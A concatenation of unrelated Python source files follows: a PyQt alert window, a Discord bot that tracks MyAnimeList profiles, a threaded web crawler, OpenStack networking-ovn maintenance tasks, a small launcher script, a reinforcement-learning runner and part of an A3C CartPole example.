" background:rgb(46, 52, 54);\n"
" font: 12pt \"URW Gothic L\";\n"
"}\n"
"QLineEdit{\n"
" color:rgb(238, 238, 236);\n"
" border:1px solid rgb(186, 189, 182);\n"
" \n"
"}")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label_img1 = QtWidgets.QLabel(self.centralwidget)
self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161))
self.label_img1.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img1.setText("")
self.label_img1.setObjectName("label_img1")
self.label_img2 = QtWidgets.QLabel(self.centralwidget)
self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161))
self.label_img2.setStyleSheet("QLabel{\n"
" border:1px solid rgb(211, 215, 207);\n"
"}")
self.label_img2.setText("")
self.label_img2.setObjectName("label_img2")
self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget)
self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41))
self.btn_stopsiren.setStyleSheet("QPushButton{\n"
" border:1px solid red; \n"
" background:rgb(239, 41, 41);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border:1px solid white;\n"
"}")
self.btn_stopsiren.setObjectName("btn_stopsiren")
self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget)
self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41))
self.btn_sndmail.setStyleSheet("QPushButton{\n"
" border:1px solid rgb(52, 101, 164); \n"
" background:rgb(52, 101, 164);\n"
" border-radius:15px;\n"
" color:white;\n"
"}\n"
"QPushButton:hover{\n"
" border: 1px solid white;\n"
"}")
self.btn_sndmail.setObjectName("btn_sndmail")
self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21))
self.lineEdit_id.setObjectName("lineEdit_id")
self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21))
self.lineEdit_name.setObjectName("lineEdit_name")
self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21))
self.lineEdit_age.setObjectName("lineEdit_age")
self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21))
self.lineEdit_gender.setObjectName("lineEdit_gender")
self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21))
self.lineEdit_nationality.setObjectName("lineEdit_nationality")
self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21))
self.lineEdit_other.setObjectName("lineEdit_other")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17))
self.label_3.setObjectName("label_3")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17))
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17))
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21))
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17))
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17))
self.label_9.setObjectName("label_9")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31))
self.label_11.setStyleSheet("QLabel{\n"
" color:rgb(115, 210, 22);\n"
" border:1px solid red;\n"
"}")
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41))
self.label_12.setStyleSheet("QLabel{\n"
" color:white; \n"
" font: 63 23pt \"URW Gothic L\";\n"
"}")
self.label_12.setObjectName("label_12")
self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21))
self.lineEdit_datetime.setObjectName("lineEdit_datetime")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21))
self.label_13.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_13.setObjectName("label_13")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21))
self.label_14.setStyleSheet("QLabel{\n"
" color:white;\n"
"}")
self.label_14.setObjectName("label_14")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
pygame.mixer.init()
pygame.mixer.music.load('Sound/siren.wav')
pygame.mixer.music.play(0)
self.P2 = multiprocessing.Process(target=self.send_mail)
self.btn_sndmail.clicked.connect(self.P2.start)
self.btn_stopsiren.clicked.connect(self.stop_)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "Area-1"))
self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail"))
self.btn_sndmail.setText(_translate("MainWindow", "Send Mail"))
self.label_3.setText(_translate("MainWindow", "ID"))
self.label_4.setText(_translate("MainWindow", "Name "))
self.label_5.setText(_translate("MainWindow", "Age"))
self.label_6.setText(_translate("MainWindow", "Gender"))
self.label_7.setText(_translate("MainWindow", "Nationality"))
self.label_8.setText(_translate("MainWindow", "Other Info"))
self.label_9.setText(_translate("MainWindow", "Date/Time"))
self.label_11.setText(_translate("MainWindow", "Match Found"))
self.label_12.setText(_translate("MainWindow", "ALERT!!!"))
self.label_13.setText(_translate("MainWindow", "Enrolled Photo"))
self.label_14.setText(_translate("MainWindow", "Last Match"))
import img
|
usercog.py
|
import io
from datetime import datetime, timedelta
from threading import Thread
import discord
import jikanpy
import timeago
from discord.ext import tasks, commands
from jikanpy import Jikan
from tqdm import tqdm
from naotomori.util import jikanCall
class UserCog(commands.Cog):
"""
UserCog: handles all the user-related logic.
"""
def __init__(self, bot):
"""
Constructor: initialize the cog.
:param bot: The Discord bot.
"""
self.bot = bot
self.discordUser = None
self.malUser = None
self.channel = None
self.jikan = Jikan()
self.progress = io.StringIO("⌛ Please wait a bit")
self.lastUpdated = None
@commands.command(brief='Ping the bot')
async def ping(self, ctx):
"""
Ping the bot.
:param ctx: The context.
"""
await ctx.send(f'Pong: {round(self.bot.latency * 1000)}ms')
def start(self):
"""
Start the UserCog:
- retrieves the user from the database, if possible
- start the updateMalProfileLoop
"""
mal, discord, channel, prefix, anime_source, manga_source, anime_ignored, manga_ignored = self.bot.get_cog('DatabaseCog').getUser()
if mal != '':
try:
self.malUser = self._getMALProfile(mal)
except jikanpy.exceptions.APIException:
pass
self.discordUser = self._getMember(discord)
if channel != '':
self.channel = self._getChannel(channel)
if prefix != '':
self.bot.command_prefix = prefix
if anime_source != '':
self.bot.get_cog('AnimeCog')._setAnimeSource(anime_source)
if manga_source != '':
self.bot.get_cog('MangaCog')._setMangaSource(manga_source)
if anime_ignored != '':
self.bot.get_cog('AnimeCog').ignore = eval(anime_ignored)
if manga_ignored != '':
self.bot.get_cog('MangaCog').ignore = eval(manga_ignored)
if not self.updateMalProfileLoop.is_running():
self.updateMalProfileLoop.start()
def _getMALProfile(self, username):
"""
Get the MyAnimeList user object, given the username.
:param username: The username of the MAL account.
:return: The MAL user.
"""
return jikanCall(self.jikan.user, username=username)
def _updateMALProfile(self, profile):
"""
Update the internal MAL user, i.e. updating the watching/reading list.
:param profile: The username of the MAL account.
"""
try:
newAnimeList = []
newMangaList = []
watching = jikanCall(self.jikan.user, username=profile, request='animelist', argument='watching')['anime']
ptw = jikanCall(self.jikan.user, username=profile, request='animelist', argument='ptw')['anime']
reading = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='reading')['manga']
ptr = jikanCall(self.jikan.user, username=profile, request='mangalist', argument='ptr')['manga']
pbar = None
if self.progress:
# Set up progressbar in case it is the first time setting the user's profile
pbar = tqdm(
total=len(watching) + len(ptw) + len(reading) + len(ptr), file=self.progress, ncols=40,
bar_format="⌛{desc}: {n_fmt}/{total_fmt} [Remaining: {remaining}]"
)
for anime in watching + ptw:
anime['title_english'] = jikanCall(self.jikan.anime, id=anime['mal_id'])['title_english']
newAnimeList.append(anime)
if self.progress:
self.progress.truncate(0) # clear previous output
self.progress.seek(0)
pbar.update()
for manga in reading + ptr:
manga['title_english'] = jikanCall(self.jikan.manga, id=manga['mal_id'])['title_english']
newMangaList.append(manga)
if self.progress:
self.progress.truncate(0)
self.progress.seek(0)
pbar.update()
# If for some reason, we cannot retrieve the new lists (e.g. API error), keep the old ones
# In other words, only update the lists if we can retrieve the new ones
if newAnimeList:
self.bot.get_cog('AnimeCog').list = newAnimeList
if newMangaList:
self.bot.get_cog('MangaCog').list = newMangaList
self.lastUpdated = datetime.now()
except Exception as e:
# There's nothing we can do :'(
print(str(e))
if self.progress:
self.progress.close()
self.progress = None # no need in the future (only need progressbar for the first set up)
def _getMember(self, user):
"""
Get the Discord member object, give its name and tag.
:param user: The user (name + tag).
:return: The member object, if none can be found, return None.
"""
for member in self.bot.get_all_members():
if str(member) == user:
return member
return None
def _getChannel(self, channelName):
"""
Get the Discord channel object, give the name of the channel.
:param channelName: The name of the channel.
:return: The channel object, if none can be found, return None.
"""
for channel in self.bot.get_all_channels():
if str(channel) == channelName:
return channel
return None
@commands.command(brief='Set your MAL profile')
async def setProfile(self, ctx, profile: str):
"""
Set the internal MAL account, as well as the discord account and bot channel.
:param ctx: The context.
:param profile: Name of the MAL account.
"""
try:
self.malUser = self._getMALProfile(profile)
except jikanpy.exceptions.APIException:
await ctx.send(f'Unable to find user {profile}, make sure the profile is public.')
return
self.progress = io.StringIO("⌛ Please wait a bit") # start new profile
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
self.discordUser = ctx.author
if self.channel is None:
self.channel = ctx.channel
self.bot.get_cog('DatabaseCog').updateValue("channel", str(self.channel))
# Store data in database
self.bot.get_cog('DatabaseCog').setProfile(profile, str(self.discordUser))
thread = Thread(target=self._updateMALProfile, args=(profile,))
thread.start()
await ctx.send(
'🎉 Successfully set profile, you\'ll now receive notifications for new anime episodes and manga chapters!\n'
'🍵 It still may take some time for your profile to update though.'
)
@commands.command(brief='Remove your MAL profile from the bot')
async def removeProfile(self, ctx):
self.bot.get_cog('DatabaseCog').setProfile("", "")
self.discordUser = None
self.malUser = None
self.channel = None
self.bot.get_cog('AnimeCog').list = []
self.bot.get_cog('MangaCog').list = []
await ctx.send('😢 Successfully removed you from the bot!')
@commands.command(brief='Get a brief overview of your MAL profile')
async def getProfile(self, ctx):
"""
Get the MAL profile in form of an embed
:param ctx: The context.
"""
if self.progress and self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="🔧 Setting up profile", value=str(self.progress.getvalue()))
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
elif self.malUser:
embed = discord.Embed(title=self.malUser['username'], color=discord.Color.green(), url=self.malUser['url'])
embed.add_field(name="Currently Watching / Plan-to-Watch Anime",
value=str(len(self.bot.get_cog('AnimeCog').list)), inline=False)
embed.add_field(name="Currently Reading / Plan-to-Read Manga",
value=str(len(self.bot.get_cog('MangaCog').list)), inline=False)
if self.lastUpdated:
now = datetime.now() + timedelta(seconds=60 * 3.4)
embed.set_footer(text=f"Last updated: {timeago.format(self.lastUpdated, now)}")
if self.malUser['image_url']:
embed.set_thumbnail(url=self.malUser['image_url'])
await ctx.send(embed=embed)
else:
await ctx.send("Profile is not set, please use `!setProfile <USERNAME>` first.")
@commands.command(brief='Set the bot channel (where it will ping you)')
async def setChannel(self, ctx, channel: discord.TextChannel):
"""
Set the bot channel.
:param ctx: The context.
:param channel: Name of the bot channel.
"""
self.channel = channel
self.bot.get_cog('DatabaseCog').updateValue("channel", str(channel))
await ctx.send(f'📺 Successfully set bot channel to {channel.mention}.')
@commands.command(brief='Set the prefix of the bot')
async def setPrefix(self, ctx, prefix: str):
"""
Set the prefix of the bot
:param ctx: The context.
:param prefix: The new prefix for the bot.
"""
self.bot.command_prefix = prefix
self.bot.get_cog('DatabaseCog').updateValue("prefix", prefix)
await ctx.send(f'❗ Successfully set the prefix to `{prefix}`.')
@setChannel.error
async def setChannelError(self, ctx, error):
"""
Error Handler for setChannel.
:param ctx: The context.
:param error: The error raised.
"""
await ctx.send(error.args[0])
@tasks.loop(hours=3)
async def updateMalProfileLoop(self):
"""
Loop that periodically updates the MAL account, i.e. update watching/reading list.
"""
if self.malUser:
thread = Thread(target=self._updateMALProfile, args=(self.malUser['username'],))
thread.start()
|
main.py
|
import threading
from queue import Queue
from spider import Spider
from domain import *
from storage import *
PROJECT_NAME = 'Musketeer'
HOMEPAGE = 'http://www.musketeer-liu.info'
DOMAIN_NAME = get_domain_name(HOMEPAGE)
QUEUE_FILE = PROJECT_NAME + '/queue.txt'
CRAWLED_FILE = PROJECT_NAME + '/crawled.txt'
THREAD_NUMBER = 8
# Thread Queue
queue = Queue()
# Call Spider Class
Spider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)
# Create worker threads (will die when main exits)
def create_workers():
for _ in range(THREAD_NUMBER):
# work is the function name
t = threading.Thread(target=work)
# thread die when main exits
t.daemon = True
t.start()
# Do the next job in the queue
def work():
while True:
url = queue.get()
Spider.crawl_page(threading.current_thread().name, url)
queue.task_done()
# Each queued link is a new job
def create_jobs():
for link in file_to_set(QUEUE_FILE):
queue.put(link)
queue.join()
crawl()
# Check if there are items in the queue, if so crawl them
def crawl():
queued_links = file_to_set(QUEUE_FILE)
if len(queued_links) > 0:
print(str(len(queued_links)) + ' links in the queue')
create_jobs()
# if __name__ == '__main__':
create_workers()
crawl()
|
maintenance.py
|
# Copyright 2017 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import threading
from futurist import periodics
from neutron.common import config as n_conf
from neutron_lib import context as n_context
from neutron_lib import exceptions as n_exc
from neutron_lib import worker
from oslo_log import log
from oslo_utils import timeutils
from networking_ovn.common import constants as ovn_const
from networking_ovn.db import maintenance as db_maint
from networking_ovn.db import revision as db_rev
from networking_ovn import ovn_db_sync
LOG = log.getLogger(__name__)
DB_CONSISTENCY_CHECK_INTERVAL = 300 # 5 minutes
class MaintenanceWorker(worker.BaseWorker):
def start(self):
super(MaintenanceWorker, self).start()
# NOTE(twilson) The super class will trigger the post_fork_initialize
# in the driver, which starts the connection/IDL notify loop which
# keeps the process from exiting
def stop(self):
"""Stop service."""
super(MaintenanceWorker, self).stop()
def wait(self):
"""Wait for service to complete."""
super(MaintenanceWorker, self).wait()
@staticmethod
def reset():
n_conf.reset_service()
class MaintenanceThread(object):
def __init__(self):
self._callables = []
self._thread = None
self._worker = None
def add_periodics(self, obj):
for name, member in inspect.getmembers(obj):
if periodics.is_periodic(member):
LOG.debug('Periodic task found: %(owner)s.%(member)s',
{'owner': obj.__class__.__name__, 'member': name})
self._callables.append((member, (), {}))
def start(self):
if self._thread is None:
self._worker = periodics.PeriodicWorker(self._callables)
self._thread = threading.Thread(target=self._worker.start)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._worker.stop()
self._worker.wait()
self._thread.join()
self._worker = self._thread = None
class DBInconsistenciesPeriodics(object):
def __init__(self, ovn_client):
self._ovn_client = ovn_client
# FIXME(lucasagomes): We should not be accessing private
# attributes like that, perhaps we should extend the OVNClient
# class and create an interface for the locks ?
self._nb_idl = self._ovn_client._nb_idl
self._idl = self._nb_idl.idl
self._idl.set_lock('ovn_db_inconsistencies_periodics')
self._sync_timer = timeutils.StopWatch()
self._resources_func_map = {
ovn_const.TYPE_NETWORKS: {
'neutron_get': self._ovn_client._plugin.get_network,
'ovn_get': self._nb_idl.get_lswitch,
'ovn_create': self._ovn_client.create_network,
'ovn_update': self._ovn_client.update_network,
'ovn_delete': self._ovn_client.delete_network,
},
ovn_const.TYPE_PORTS: {
'neutron_get': self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lswitch_port,
'ovn_create': self._ovn_client.create_port,
'ovn_update': self._ovn_client.update_port,
'ovn_delete': self._ovn_client.delete_port,
},
ovn_const.TYPE_FLOATINGIPS: {
'neutron_get': self._ovn_client._l3_plugin.get_floatingip,
'ovn_get': self._nb_idl.get_floatingip,
'ovn_create': self._ovn_client.create_floatingip,
'ovn_update': self._ovn_client.update_floatingip,
'ovn_delete': self._ovn_client.delete_floatingip,
},
ovn_const.TYPE_ROUTERS: {
'neutron_get': self._ovn_client._l3_plugin.get_router,
'ovn_get': self._nb_idl.get_lrouter,
'ovn_create': self._ovn_client.create_router,
'ovn_update': self._ovn_client.update_router,
'ovn_delete': self._ovn_client.delete_router,
},
ovn_const.TYPE_SECURITY_GROUPS: {
'neutron_get': self._ovn_client._plugin.get_security_group,
'ovn_get': self._get_security_group,
'ovn_create': self._ovn_client.create_security_group,
'ovn_delete': self._ovn_client.delete_security_group,
},
ovn_const.TYPE_SECURITY_GROUP_RULES: {
'neutron_get':
self._ovn_client._plugin.get_security_group_rule,
'ovn_get': self._nb_idl.get_acl_by_id,
'ovn_create': self._ovn_client.create_security_group_rule,
'ovn_delete': self._ovn_client.delete_security_group_rule,
},
ovn_const.TYPE_ROUTER_PORTS: {
'neutron_get':
self._ovn_client._plugin.get_port,
'ovn_get': self._nb_idl.get_lrouter_port,
'ovn_create': self._create_lrouter_port,
'ovn_update': self._ovn_client.update_router_port,
'ovn_delete': self._ovn_client.delete_router_port,
},
}
def _get_security_group(self, uuid):
return (self._nb_idl.get_address_set(uuid) or
self._nb_idl.get_port_group(uuid))
@property
def has_lock(self):
return not self._idl.is_lock_contended
def _fix_create_update(self, row):
res_map = self._resources_func_map[row.resource_type]
admin_context = n_context.get_admin_context()
try:
# Get the latest version of the resource in Neutron DB
n_obj = res_map['neutron_get'](admin_context, row.resource_uuid)
except n_exc.NotFound:
LOG.warning('Skip fixing resource %(res_uuid)s (type: '
'%(res_type)s). Resource does not exist in Neutron '
'database anymore', {'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
return
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
res_map['ovn_create'](n_obj)
else:
if row.resource_type == ovn_const.TYPE_SECURITY_GROUP_RULES:
LOG.error("SG rule %s found with a revision number while "
"this resource doesn't support updates",
row.resource_uuid)
elif row.resource_type == ovn_const.TYPE_SECURITY_GROUPS:
# In OVN, we don't care about updates to security groups,
# so just bump the revision number to whatever it's
# supposed to be.
db_rev.bump_revision(n_obj, row.resource_type)
else:
ext_ids = getattr(ovn_obj, 'external_ids', {})
ovn_revision = int(ext_ids.get(
ovn_const.OVN_REV_NUM_EXT_ID_KEY, -1))
# If the resource exist in the OVN DB but the revision
# number is different from Neutron DB, updated it.
if ovn_revision != n_obj['revision_number']:
res_map['ovn_update'](n_obj)
else:
# If the resource exist and the revision number
# is equal on both databases just bump the revision on
# the cache table.
db_rev.bump_revision(n_obj, row.resource_type)
def _fix_delete(self, row):
res_map = self._resources_func_map[row.resource_type]
ovn_obj = res_map['ovn_get'](row.resource_uuid)
if not ovn_obj:
db_rev.delete_revision(row.resource_uuid, row.resource_type)
else:
res_map['ovn_delete'](row.resource_uuid)
def _fix_create_update_subnet(self, row):
# Get the lasted version of the port in Neutron DB
admin_context = n_context.get_admin_context()
sn_db_obj = self._ovn_client._plugin.get_subnet(
admin_context, row.resource_uuid)
n_db_obj = self._ovn_client._plugin.get_network(
admin_context, sn_db_obj['network_id'])
if row.revision_number == ovn_const.INITIAL_REV_NUM:
self._ovn_client.create_subnet(sn_db_obj, n_db_obj)
else:
self._ovn_client.update_subnet(sn_db_obj, n_db_obj)
# The migration will run just once per neutron-server instance. If the lock
# is held by some other neutron-server instance in the cloud, we'll attempt
# to perform the migration every 10 seconds until completed.
@periodics.periodic(spacing=10, run_immediately=True)
def migrate_to_port_groups(self):
"""Perform the migration from Address Sets to Port Groups. """
# TODO(dalvarez): Remove this in U cycle when we're sure that all
# versions are running using Port Groups (and OVS >= 2.10).
# If Port Groups are not supported or we've already migrated, we don't
# need to attempt to migrate again.
if (not self._nb_idl.is_port_groups_supported() or
not self._nb_idl.get_address_sets()):
raise periodics.NeverAgain()
# Only the worker holding a valid lock within OVSDB will perform the
# migration.
if not self.has_lock:
return
admin_context = n_context.get_admin_context()
nb_sync = ovn_db_sync.OvnNbSynchronizer(
self._ovn_client._plugin, self._nb_idl, self._ovn_client._sb_idl,
None, None)
nb_sync.migrate_to_port_groups(admin_context)
raise periodics.NeverAgain()
@periodics.periodic(spacing=DB_CONSISTENCY_CHECK_INTERVAL,
run_immediately=True)
def check_for_inconsistencies(self):
# Only the worker holding a valid lock within OVSDB will run
# this periodic
if not self.has_lock:
return
create_update_inconsistencies = db_maint.get_inconsistent_resources()
delete_inconsistencies = db_maint.get_deleted_resources()
if not any([create_update_inconsistencies, delete_inconsistencies]):
return
LOG.debug('Maintenance task: Synchronizing Neutron '
'and OVN databases')
self._sync_timer.restart()
# Fix the create/update resources inconsistencies
for row in create_update_inconsistencies:
try:
# NOTE(lucasagomes): The way to fix subnets is bit
# different than other resources. A subnet in OVN language
# is just a DHCP rule but, this rule only exist if the
# subnet in Neutron has the "enable_dhcp" attribute set
# to True. So, it's possible to have a consistent subnet
# resource even when it does not exist in the OVN database.
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._fix_create_update_subnet(row)
else:
self._fix_create_update(row)
except Exception:
LOG.exception('Failed to fix resource %(res_uuid)s '
'(type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
# Fix the deleted resources inconsistencies
for row in delete_inconsistencies:
try:
if row.resource_type == ovn_const.TYPE_SUBNETS:
self._ovn_client.delete_subnet(row.resource_uuid)
else:
self._fix_delete(row)
except Exception:
LOG.exception('Failed to fix deleted resource %(res_uuid)s '
'(type: %(res_type)s)',
{'res_uuid': row.resource_uuid,
'res_type': row.resource_type})
self._sync_timer.stop()
LOG.info('Maintenance task synchronization finished '
'(took %.2f seconds)', self._sync_timer.elapsed())
def _create_lrouter_port(self, port):
admin_context = n_context.get_admin_context()
router_id = port['device_id']
self._ovn_client._l3_plugin.add_router_interface(
admin_context, router_id, {'port_id': port['id']}, may_exist=True)
|
runme.py
|
import time
import os
import threading
def runPy(name):
os.system("start cmd /c python " + name)
authServer = threading.Thread(target=runPy, args=("server.py",), name="auth_server")
client = threading.Thread(target=runPy, args=("client.py",), name="client")
authServer.start()
client.start()
|
runner.py
|
import threading
from rlrunner.agents.base_agent import BaseAgent
from rlrunner.envs.base_env import BaseEnv
from rlrunner.stats.base_stat_saver import BaseStatSaver
from rlrunner.termination.base_termination_condition import BaseTerminationCondition
class Runner:
"""
# This is the main class and the class you should instantiate
# you will call methods from here to change the runner and add agents, etc
# and then call the do_it() method to start the run simulation
# the loop hierarchy is (Env -> Agent ->) Run -> Episode -> Step
# Note: prints for seeing the current progress should be implemented in TC (termination condition) or
# SS (StatSaver) or even the render() in Env
"""
envs = []
agents = []
termination_cond = None
stat_saver = None
def __init__(self, number_of_runs=1, max_step_number=1000000):
self.number_of_runs = number_of_runs
self.max_step_number = max_step_number
def set_termination_condition(self, termination_cond):
if not isinstance(termination_cond, BaseTerminationCondition):
print("Error: TerminationCondition doesn't come from BaseTerminationCondition")
return
self.termination_cond = termination_cond
def set_stat_saver(self, stat_saver):
if not isinstance(stat_saver, BaseStatSaver):
print("Error: StatSaver doesn't come from BaseStatSaver")
return
self.stat_saver = stat_saver
def add_agent(self, agent):
if not isinstance(agent, BaseAgent):
print("Error: Agent doesn't come from BaseAgent")
return
self.agents.append(agent)
def remove_agent(self, agent):
self.agents.remove(agent)
def add_env(self, env):
if not isinstance(env, BaseEnv):
print("Error: Env doesn't come from BaseEnv")
return
self.envs.append(env)
def remove_env(self, env):
self.envs.remove(env)
def do_it(self, verbose=True):
x = threading.Thread(target=self.make_run, daemon=True, args=[verbose])
x.start()
return x
def make_run(self, verbose=True):
if self.termination_cond is None:
print("Error: There is no TerminationCondition, you should set one")
return
for env in self.envs:
for agent in self.agents:
if self.stat_saver is not None and not self.stat_saver.should_i_run_agent(env, agent, self.number_of_runs):
continue
agent.setup(env.action_space, env.observation_space)
if verbose:
print("Starting Runs for agent %s in env %s" % (agent.name, env.name))
# loop of runs
for run_number in range(self.number_of_runs):
if verbose:
print("Doing Run nr", run_number)
# loop of episodes
episode_number = -1
active_run = True
while active_run:
episode_number += 1
is_exploit_episode = self.termination_cond.is_exploit_episode(episode_number)
obs = env.reset()
# loop of steps
for step_nr in range(self.max_step_number):
env.render()
action = agent.get_action(obs, is_exploit_episode)
result = env.step(action)
if len(result) == 4:
new_observation, reward, done, _ = result
else:
new_observation, reward, done = result
transition = (obs, action, reward, new_observation, done)
agent.learn(transition)
obs = new_observation
self.termination_cond.update_info(episode_number, transition)
if self.stat_saver is not None:
self.stat_saver.step_update(is_exploit_episode, env, agent,
(run_number, episode_number, step_nr), transition)
if done:
break
active_run = not self.termination_cond.check_termination(episode_number)
# 1. episode ends
# 2. run ends
agent.reset()
# 3. runs with agent end / time for new agent
# 4. agents with env end / time for new env
env.close()
# 5. all ends
print()
print("All done.")
|
A3C_discrete_action.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example.
View more on my tutorial page: https://morvanzhou.github.io/tutorials/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
import matplotlib.pyplot as plt
GAME = 'CartPole-v0'
OUTPUT_GRAPH = True
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 1000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('a_loss'):
log_prob = tf.reduce_sum(tf.log(self.a_prob + 1e-5) * tf.one_hot(self.a_his, N_A, dtype=tf.float32), axis=1, keep_dims=True)
exp_v = log_prob * tf.stop_gradient(td)
entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
axis=1, keep_dims=True) # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
